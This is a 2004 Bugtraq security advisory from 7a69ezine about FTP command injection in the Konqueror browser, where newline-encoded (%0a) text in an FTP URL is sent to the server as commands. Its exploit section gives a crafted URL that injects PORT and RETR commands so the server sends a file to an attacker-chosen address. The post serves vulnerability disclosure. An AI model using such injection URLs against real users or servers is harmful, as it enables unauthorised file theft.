[37616] in bugtraq
7a69Adv#16 - Konqueror FTP command injection
daemon@ATHENA.MIT.EDU (Albert Puigsech Galicia)
Tue Dec 7 17:19:01 2004
From: Albert Puigsech Galicia <ripe@7a69ezine.org>
Reply-To: ripe@7a69ezine.org
To: bugtraq@securityfocus.com
Date: Sun, 5 Dec 2004 10:11:50 +0100
MIME-Version: 1.0
Message-Id: <200412051011.54045.ripe@7a69ezine.org>
Content-Type: multipart/signed;
boundary="nextPart220449995.NOd4arpk9E";
protocol="application/pgp-signature";
micalg=pgp-sha1
Content-Transfer-Encoding: 7bit
--nextPart220449995.NOd4arpk9E
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
=2D ------------------------------------------------------------------
7a69ezine Advisories 7a69Adv#16
=2D ------------------------------------------------------------------
http://www.7a69ezine.org [05/12/2004]
=2D ------------------------------------------------------------------
Title: Konqueror FTP command injection
Author: Albert Puigsech Galicia - <ripe@7a69ezine.org>
Software: Konqueror browser
Versions: >=3D 3.3.1
Remote: yes
Exploit: yes
Severity: Low-Medium
=2D ------------------------------------------------------------------
I. Introduction.
Konqueror is a very multifuncional HTTP browser included on KDE base packa=
ge.=20
Like others browsers it can use more protocols, for example FTP. This=20
aplication is usualy used to navigate through the filesystems.
II. Description.
In order to access to a server FTP using Internet Explorer you write=20
"ftp://ftpuser:ftppass@server/directory" in the directions's bar and then t=
he=20
navigator connects to the server and executes the following commands (and=20
other that have omitted because they are not important for this stuff).
USER ftpuser
PASS ftppass
CWD /directory/
The security problem resides in which is posible to inject FTP commands on=
=20
the URL adding at the code %0a followed by your injected commands. If you d=
o=20
"ftp://ftpuser:ftppass@server/directory%0asomecommand%0a" it will execute=20
those commands.
USER ftpuser
PASS ftppass
CWD /directory
somecommand
The last line is an erroneous command, but it's not a problem because=20
'somecommand' has already been executed.
III. Exploit
You need to deceive a user to go to your URL and then to introduce a valid=
=20
user and password. So yes! The explotation also requires to apply social=20
engineering. Then you can do a lot of things using this bug like create or=
=20
delete files and directories, but probably, the most interesting thing is t=
o=20
download files. Its posible to do that using this URL;
ftp://server/%0aPORT%20a,b,c,d,e,f%0aRETR%20/file
Then the server will connect to a.b.c.d and port e,f (see FTP RFC to=20
translate the port number) and will send the file data.
IV. Patch
Konqueror developers have been contacted, and patch will be avaliable soon.
V. Timeline
01/12/2004 - Bug discovered
02/12/2004 - KDE developers contacted
03/12/2004 - Fast developers reply
03/12/2004 - IE also afected, so we decide to publish the bug
05/12/2004 - Advisor released
VI. Extra data
You can find more 7a69ezine advisories on this following link:
http://www.7a69ezine.org/avisos/propios [spanish info]
--nextPart220449995.NOd4arpk9E
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
iD8DBQBBstDaVLMpEcDCGUcRApTuAJ95CKeWq551WNEd0tIiYpm6yW+2gACfUbgb
OykQFqyO9G1fFfiwY7lH9Jg=
=Kd/W
-----END PGP SIGNATURE-----
--nextPart220449995.NOd4arpk9E--
